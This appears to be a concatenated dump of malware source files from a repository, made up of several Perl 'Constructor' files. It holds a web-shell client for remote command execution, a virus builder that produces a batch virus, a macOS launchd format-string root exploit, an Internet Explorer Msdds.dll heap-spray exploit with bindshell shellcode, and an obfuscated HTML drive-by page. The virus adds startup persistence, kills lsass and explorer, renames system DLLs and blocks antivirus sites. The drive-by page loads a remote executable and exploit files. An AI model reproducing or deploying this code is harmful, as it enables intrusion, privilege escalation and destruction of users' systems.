$ENV{PERL_RL} = " o=0"; # use best available ReadLine without ornaments
my $request = $ARGV[0];
my $shtam = $ARGV[1];
unless ($request && $shtam) {
print "Usage: $0 host/dir/script KEY\n\n";
exit -1;
}
my $hostname;
if ($request =~ /^([^\/]+)(.*)/s) {
$hostname = $1;
$request = $2
if (!$use_proxy);
if ($hostname =~ /([^:]+):(.*)/) {
$hostname = $1;
$http_port = $2;
}
} else {
print "unable to parse hostname from $ARGV[0]\n\n";
exit -1;
}
if (!$use_proxy) {
if ($hostname !~ /\d+\.\d+\.\d+\.\d+/) {
(my $name, my $aliases, my $addrtype, my $length, my @addrs) =
gethostbyname($hostname)
or die "unable to resolve hostname '$hostname'\n\n";
$host = join('.', unpack('C4', $addrs[0]));
} else {
$host = $hostname;
}
$port = $http_port;
} else {
$request = "http://".$request;
}
my $term = Term::ReadLine->new("wsh");
my $OUT = $term->OUT() || *STDOUT;
my @h_list = ();
my $io;
my $file;
while (defined (my $cmd = $term->readline("$shell_prompt "))) {
next if (length($cmd) == 0);
# wsh commands --- begin
exit 0 if ($cmd =~ /^exit$/s);
if ($cmd =~ /^history$/s) {
my $h_counter = 1;
foreach (@h_list) {
print $OUT " ".($h_counter++)."\t$_\n";
}
next;
}
if ($cmd =~ /^\!(\d+)$/s) {
($1 > 0 && $1 <= scalar(@h_list)) ?
$cmd = $h_list[$1-1] :
next;
}
$io = undef;
if ($cmd =~ /^wsh((get)|(put)) ['" ]*?([^'"]+)/s) {
$io = $1;
$file = $4;
($pwd =~ /\/$/s) ?
$cmd = "wsh$io \"$pwd$file\"" :
$cmd = "wsh$io \"$pwd/$file\"";
if ($io =~ /put/) {
unless (open(FH, $file)) {
print "$file: $!\n";
next;
}
$cmd = join(//, ($cmd, <FH>));
close(FH);
}
}
# wsh commands --- end
push(@h_list, $cmd);
if ($cmd =~ /^cd ['"]?([^'"; ]+)$/s) {
my $dir = $1;
if ($dir !~ /^\//s) {
$pwd = "$pwd/$dir";
$pwd =~ s/[^\/]+\/\.\.//g;
$pwd =~ s/\/{2,}/\//g;
$pwd =~ s/\/$//;
} else {
$pwd = $dir;
}
next;
}
$cmd = "if [ -d $pwd ];then cd $pwd;".
"else echo 'cd: $pwd: No such file or directory';exit 0;fi;$cmd"
unless (defined($io));
my $cmd_s = $pattern;
$cmd_s =~ s/ST/$shtam/;
$cmd_s =~ s/COM/$cmd/;
my $cmd_sl = length($cmd_s);
my $socket = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM) or die $!;
($anticache) ?
print $socket "POST $request?".(int(rand(9999)))." HTTP/1.0\r\n" :
print $socket "POST $request HTTP/1.0\r\n";
print $socket
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: $agent\r\n".
"Host: $hostname\r\n".
"Content-Length: $cmd_sl\r\n";
($use_proxy) ?
print $socket
"Proxy-Connection: close\r\n".
"Pragma: no-cache\r\n" :
print $socket
"Connection: close\r\n";
print $socket
"\r\n".
"$cmd_s";
my $cl = 0;
my $crlf = 0;
my @msg = ();
while (my $str = <$socket>) {
if (!$crlf && $str =~ /^\s*?$/s) {
$crlf = 1;
next;
}
$msg[$crlf] = $msg[$crlf].$str;
if (!$cl && $crlf) {
$cl = length($msg[0]) + 4;
if ($msg[0] =~ /Content-Length: (\d+)/s) {
$cl += $1;
} else {
$cl = -1;
}
}
last if ($cl > 0 && length($msg[0].$msg[1])+4 >= $cl);
}
close($socket);
if ($msg[0] !~ /^[^ ]+ 200/s) {
print $OUT "HTTP request fail:\n\n$msg[0]\n";
next;
}
if ($io =~ /get/) {
if (length($msg[1]) > 0) {
if (open(FH, "> $file")) {
print FH $msg[1];
close(FH);
} else {
print $OUT $!;
}
} else {
print $OUT "wshget fail\n"
}
} else {
print $OUT $msg[1];
}
}

244
Perl/Constructor.Perl.DAV.a Normal file
View File

@ -0,0 +1,244 @@
# Virus Builder
# by dav
$vname = '';
$vwriter = '';
$vbsmsgtxt = '';
$vtime = '';
print("*******************\n");
print("DAV's Virus Builder\n");
print("BAT/VIRUS\n");
print("*******************\n");
print("\n");
print("VirusName?\n");
chomp ($vname = <STDIN>);
print("\n");
print("Author?\n");
chomp ($vwriter = <STDIN>);
print("\n");
open(FH,">virus.bat");
print FH '@echo off';
print FH "\n";
close(FH);
open(FH,">>virus.bat");
print FH "rem $vname - Virus\n";
print FH "rem by $vwriter\n";
print FH "rem ** generated with dav's virus builder v.1.0 in perl **\n";
print FH "set dav=echo\n";
print FH "set davv=copy\n";
print FH "set davvv=reg add\n";
print FH "set davvvv=del\n";
print FH "set davvvvv=net share\n";
print FH "set davvvvvv=cls\n";
print FH "set davvvvvvv=taskkill\n";
print FH "set davvvvvvvv=ren\n";
print FH "set davvvvvvvvv=call\n";
print FH "set davvvvvvvvvv=shutdown\n";
print FH "%davv% %0 %windir%\\vwin.bat > nul";
print FH "\n";
close(FH);
print("*** Startup Methods ***\n");
print("Autostart/Startup Infect - yes/no?\n");
chomp ($vstartup = <STDIN>);
if($vstartup=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "chcp 1252 > nul";
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\win.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\win.bat" > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("REGentry(works on all winsys) - yes/no?\n");
chomp ($regy = <STDIN>);
if($regy=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davvv% "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';
print FH "\n";
print FH '%davvv% "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("*** Virus Main Function ***\n");
print("Shutdown with time and comment - yes/no?\n");
chomp ($shutdown = <STDIN>);
if($shutdown=~m/^(yes|ja|j|y)/i) {
print("Seconds to restart?\n");
chomp ($vtime = <STDIN>);
print("Comment?\n");
chomp ($vcom = <STDIN>);
open(FH,">>virus.bat");
print FH "%davvvvvvvvvv% /s /f /t ";
print FH "$vtime";
print FH " ";
print FH "/c ";
print FH '"';
print FH "$vcom";
print FH '"';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("LSASS.exe and EXPLORER.exe Killer - yes/no?\n");
chomp ($lsass = <STDIN>);
if($lsass=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%davvvvvvv% /f /im explorer.exe\n";
print FH "%davvvvvvv% /f /im lsass.exe \n";
close(FH); } else { print "x\n" }
print("\n");
print("Net Share c:, g: ... - yes/no?\n");
chomp ($netshare = <STDIN>);
if($netshare=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%davvvvv% c=c:\n";
print FH "%davvvvv% g=g:\n";
print FH "%davvvvv% f=f:\n";
print FH "%davvvvv% y=y:\n";
close(FH); } else { print "x\n" }
print("\n");
print("kill cookies - yes/no?\n");
chomp ($vcookie = <STDIN>);
if($vcookie=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davvvvvvvv% "c:\documents and settings\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
print FH "\n";
print FH '%davvvvvvvv% "C:\Dokumente und Einstellungen\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("infect hosts file - yes/no?\n");
chomp ($vhosts = <STDIN>);
if($vhosts=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%dav% 127.0.0.1 www.google.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.google.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.symantec.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.antivir.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.f-secure.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.f-secure.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.kaspersky.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.kaspersky.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.nai.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 windowsupdate.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.symantec.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.microsoft.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.free-av.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.sophos.com >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%dav% 127.0.0.1 www.sophos.de >> %windir%\\system32\\drivers\\etc\\hosts\n";
print FH "%davvvvvv%\n";
close(FH); } else { print "x\n" }
print("\n");
print("Random Population - yes/no?\n");
chomp ($ranpop = <STDIN>);
if($ranpop=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 %random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davv% %0 c:\\%random%.bat\n";
print FH "%davvvvvv%\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("infect some .exe files - yes/no?\n");
chomp ($syskiller = <STDIN>);
if($syskiller=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davv% %0 %windir%\\system32\\taskmgr.exe > nul';
print FH "\n";
print FH '%davv% %0 %windir%\\system32\\winlogon.exe > nul';
print FH "\n";
print FH '%davv% %0 %windir%\\system32\\svchost.exe > nul';
print FH "\n";
print FH '%davv% %0 %windir%\\system32\\calc.exe > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("kill .dll .ini files (** WARNING! **) - yes/no?\n");
chomp ($syskiller1 = <STDIN>);
if($syskiller1=~m/^(yes|ja|j|y)/i) {
open(FH,">>virus.bat");
print FH '%davvvvvvvv% %0 %windir%\\system32\\*.dll *.-fUcKeD > nul';
print FH "\n";
print FH '%davvvvvvvv% %0 %windir%\\system32\\*.ini *.FuCkEd- > nul';
print FH "\n";
close(FH); } else { print "x\n" }
print("\n");
print("VBS Messagebox - yes/no?\n");
chomp ($vbsmsg = <STDIN>);
if($vbsmsg=~m/^(yes|ja|j|y)/i) {
print("Message?\n");
chomp ($vbsmsgtxt = <STDIN>);
open(FH,">>virus.bat");
print FH '%dav% MsgBox "';
print FH "$vbsmsgtxt";
print FH '", 16, "ViRuS!!!" > msg.vbs';
print FH "\n";
print FH "%davvvvvvvvv% msg.vbs\n";
close(FH); } else { print "x\n" }
print("\n");
open(FH,">>virus.bat");
print FH "goto ende\n";
print FH ":ende\n";
close(FH);
print("\n");
while ($cya ne 'exit') {
print "*** VIRUS.BAT BUILT ***\n";
print "*** DON'T SPREAD YOUR VIRUS. ***\n";
print "*** I AM NOT RESPONSIBLE FOR POSSIBLE DAMAGES OR SOMETHING ELSE. ***\n";
print "*** exit to quit ***\n";
chomp ($cya = <STDIN>);
print "\n"; }

126
Perl/Constructor.Perl.Machd.a Normal file
View File

@ -0,0 +1,126 @@
# http://www.digitalmunition.com/FailureToLaunch.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is a practical application of Non Executable Stack Lovin - http://www.digitalmunition.com/NonExecutableLovin.txt
#
# This code currently jumps into 0x1811111 via dyld_stub_close()
#
# This exploit will create a malicious .plist file for you to use with launchctl
# k-fs-computer:~ kf$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
#
# This was tested against OSX 10.4.6 8l1119 on a 1.5GHz Intel Core Solo
#
# k-fs-computer:~ kf$ ls -al /sbin/launchd
# -rwsr-sr-x 1 root wheel 161944 Feb 19 04:46 /sbin/launchd
# k-fs-computer:~ kf$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O universal binary with 2 architectures
# /sbin/launchd (for architecture i386): Mach-O executable i386
# /sbin/launchd (for architecture ppc): Mach-O executable ppc
#
# ./src/SystemStarter.c:374: syslog(level, buf);
# proactive security eh?
foreach $key (keys %ENV) {
delete $ENV{$key};
}
$writeaddr = 0xa0011163; # close()
#$writeaddr = 0xa00119f1; # cxa_finalize() (must wait 25 seconds or so if you use this one)
$sc = (0x1811111);
# both of these arrays are put in size order due to the multiple writes via unformatted syslog() call
# seteuid after thought... whoops...I had to move some shit arround to account for this
@seteuid =
([$sc+2, $sc+4, $sc, $sc+6],
[0x5050, 0xb7b0, 0xc031, 0x80cd], );
# Write the following instructions to 0xa0011163 <dyld_stub_close> as well as nemos execve() to 0x1811111
# mov $0x1811111,%eax
# jmp *%eax
#
@payload =
([$writeaddr+6, $writeaddr, $sc+12, $sc+16, $sc+28, $sc+22, $sc+26, $sc+24, $sc+10, $sc+14, $sc+18, $sc+30, $writeaddr+2, $sc+20, $sc+8, $writeaddr+4], # 0
[0x00e0, 0x11b8, 0x2f2f, 0x2f68, 0x3bb0, 0x50e3, 0x5353, 0x5454, 0x6850, 0x6873, 0x6d74, 0x80cd, 0x8111, 0x8970, 0xc031, 0xff01], );
$ENV{"TERM_PROGRAM"} = "." .
# string of write address
pack('l', $payload[0][0]) . pack('l', $payload[0][1]) . pack('l', $payload[0][2]) . pack('l', $payload[0][3]) . pack('l', $payload[0][4]) . pack('l', $payload[0][5]) . pack('l', $payload[0][6]) . pack('l', $payload[0][7]) . pack('l', $payload[0][8]) . pack('l', $payload[0][9]) . pack('l', $payload[0][10]) . pack('l', $payload[0][11]) . pack('l', $payload[0][12]) . pack('l', $payload[0][13]) . pack('l', $payload[0][14]) . pack('l', $payload[0][15]) . pack('l', $seteuid[0][0]) . pack('l', $seteuid[0][1]) . pack('l', $seteuid[0][2]) . pack('l', $seteuid[0][3]) ;
# lazy non looped length calculations
$pay1 = $payload[1][0];
$pay2 = ($payload[1][1] - $pay1 - 0x1 );
$pay3 = ($payload[1][2] - $pay1 - $pay2 - 0x1);
$pay4 = ($payload[1][3] - $pay1 - $pay2 - $pay3 - 0x1);
$pay5 = ($payload[1][4] - $pay1 - $pay2 - $pay3 - $pay4 - 0x1);
$pay6 = ($payload[1][5] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - 0x1);
$pay7 = ($payload[1][6] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 0x1);
$pay8 = ($payload[1][7] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - 0x1);
$pay9 = ($payload[1][8] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - 0x1);
$pay10 = ($payload[1][9] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - 0x1);
$pay11 = ($payload[1][10] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - 0x1);
$pay12 = ($payload[1][11] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - 0x1);
$pay13 = ($payload[1][12] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - 0x2);
$pay14 = ($payload[1][13] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - 0x2);
$pay15 = ($payload[1][14] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - 0x2);
$pay16 = ($payload[1][15] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - $pay15 - 0x3);
# seems I forgot the seteuid(0)
$pay17 = 0xff + $seteuid[1][0];
$pay18 = 0xff + ($seteuid[1][1] - $pay17);
$pay19 = 0xff + ($seteuid[1][2] - $pay17 - $pay18 ) ;
$pay20 = 0xff + ($seteuid[1][3] - $pay17 - $pay18 - $pay19 - 0x7ec8 - 0x270) ; # Something is fucking this write up... subtracting 0x8138 seems to help
# The offset is off by 6 if you are trying to debug this in gdb
$format =
"%." . $pay1 . "d" . "%246\$hn" .
"%." . $pay2 . "d" . "%247\$hn" .
"%." . $pay3 . "d" . "%248\$hn" .
"%." . $pay4 . "d" . "%249\$hn" .
"%." . $pay5 . "d" . "%250\$hn" .
"%." . $pay6 . "d" . "%251\$hn" .
"%." . $pay7 . "d" . "%252\$hn" .
"%." . $pay8 . "d" . "%253\$hn" .
"%." . $pay9 . "d" . "%254\$hn" .
"%." . $pay10 . "d" . "%255\$hn" .
"%." . $pay11 . "d" . "%256\$hn" .
"%." . $pay12 . "d" . "%257\$hn" .
"%." . $pay13 . "d" . "%258\$hn" .
"%." . $pay14 . "d" . "%259\$hn" .
"%." . $pay15 . "d" . "%260\$hn" .
"%." . $pay16 . "d" . "%261\$hn" .
"%." . $pay17 . "d" . "%262\$hn" .
"%." . $pay18 . "d" . "%263\$hn" .
"%." . $pay19 . "d" . "%264\$hn" .
"%." . $pay20 . "d" . "%265\$hn" ;
open(SUSH,">/tmp/aaa.c");
printf SUSH "int main(){setuid(0);setgid(0);system(\"/bin/sh\");}\n";
system("PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c");
open(PWNED,">com.pwnage.plist");
print PWNED "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>" . "$format" .
"</string>
<key>ProgramArguments</key>
<array>
<string>http://www.digitalmunition.com</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>\n";
print "open a new window and type - \"launchctl load ./com.pwnage.plist\"\n";
system("/sbin/launchd");

80
Perl/Constructor.Perl.Msdds.a Normal file
View File

@ -0,0 +1,80 @@
#######################################################
#
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
#
#######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#######################################################
# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";
# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<700;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";
# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';
# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object></body></html>\n".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";
# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

82
Perl/Constructor.Perl.Msdds.b Normal file
View File

@ -0,0 +1,82 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<NOSCRIPT>This page uses Javascript</NOSCRIPT>
<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">
document.write(unescape("%3c%68%74%6d%6c%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%49%46%52%41%4d%45%20%73%72%63%3d%22%78%70%6c%2e%77%6d%66%22%0d%0a%20"));
document.write(unescape("%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%31%20%76%73%70%61%63%65%3d%31%20%68%73%70%61%63%65%3d%31%20%6d%61%72%67%69%6e%77"));
document.write(unescape("%69%64%74%68%3d%31%20%6d%61%72%67%69%6e%68%65%69%67%68%74%3d%31%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73"));
document.write(unescape("%63%72%6f%6c%6c%69%6e%67%3d%6e%6f%3e%0d%0a%20%20%3c%2f%49%46%52%41%4d%45%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%73%74%79"));
document.write(unescape("%6c%65%3e%0d%0a%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65"));
document.write(unescape("%74%2f%61%64%76%2f%30%31%2f%73%70%6c%6f%69%74%2e%61%6e%72%22%29%7d%0d%0a%3c%2f%73%74%79%6c%65%3e%0d%0a%3c%41%50%50%4c%45"));
document.write(unescape("%54%20%41%52%43%48%49%56%45%3d%27%63%6f%75%6e%74%2e%6a%61%72%27%20%43%4f%44%45%3d%27%42%6c%61%63%6b%42%6f%78%2e%63%6c%61"));
document.write(unescape("%73%73%27%20%57%49%44%54%48%3d%31%20%48%45%49%47%48%54%3d%31%3e%0d%0a%3c%50%41%52%41%4d%20%4e%41%4d%45%3d%27%75%72%6c%27"));
document.write(unescape("%20%56%41%4c%55%45%3d%27%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%77%69%6e%33"));
document.write(unescape("%32%2e%65%78%65%27%3e%3c%2f%41%50%50%4c%45%54%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%74%72%79%7b%0d%0a%64%6f%63%75%6d%65"));
document.write(unescape("%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%60%26%23%31%30%39%26%23%31%31%35%26%23%34%35%26%23"));
document.write(unescape("%31%30%35%26%23%31%31%36%26%23%31%31%35%26%23%35%38%26%23%31%30%39%26%23%31%30%34%26%23%31%31%36%26%23%31%30%39%26%23%31"));
document.write(unescape("%30%38%26%23%35%38%26%23%31%30%32%26%23%31%30%35%26%23%31%30%38%26%23%31%30%31%26%23%35%38%26%23%34%37%26%23%34%37%26%23"));
document.write(unescape("%36%37%26%23%35%38%26%23%39%32%26%23%31%30%32%26%23%31%31%31%3b%6f%2e%6d%68%74%21%27%2b%27%68%74%74%70%3a%2f%2f%67%61%6d"));
document.write(unescape("%65%34%75%73%65%72%2e%6e%65%74%2f%2f%61%64%76%2f%2f%30%31%2f%2f%74%61%72%67%2e%63%68%27%2b%27%6d%3a%3a%2f%74%61%72%67%27"));
document.write(unescape("%2b%27%65%74%2e%68%74%6d%60%20%74%79%70%65%3d%60%74%65%78%74%2f%78%2d%73%63%72%69%70%74%6c%65%74%60%3e%3c%2f%6f%62%27%2b"));
document.write(unescape("%27%6a%65%63%74%3e%27%29%3b%0d%0a%7d%63%61%74%63%68%28%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69"));
document.write(unescape("%70%74%3e%0d%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25"));
document.write(unescape("%75%39%30%39%30%25%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65%25%75%30%30%34"));
document.write(unescape("%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30"));
document.write(unescape("%30%30%37%25%75%30%30%30%30%25%75%37%32%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25"));
document.write(unescape("%75%30%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75%31%33%65%38%25%75%30%30%30"));
document.write(unescape("%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36"));
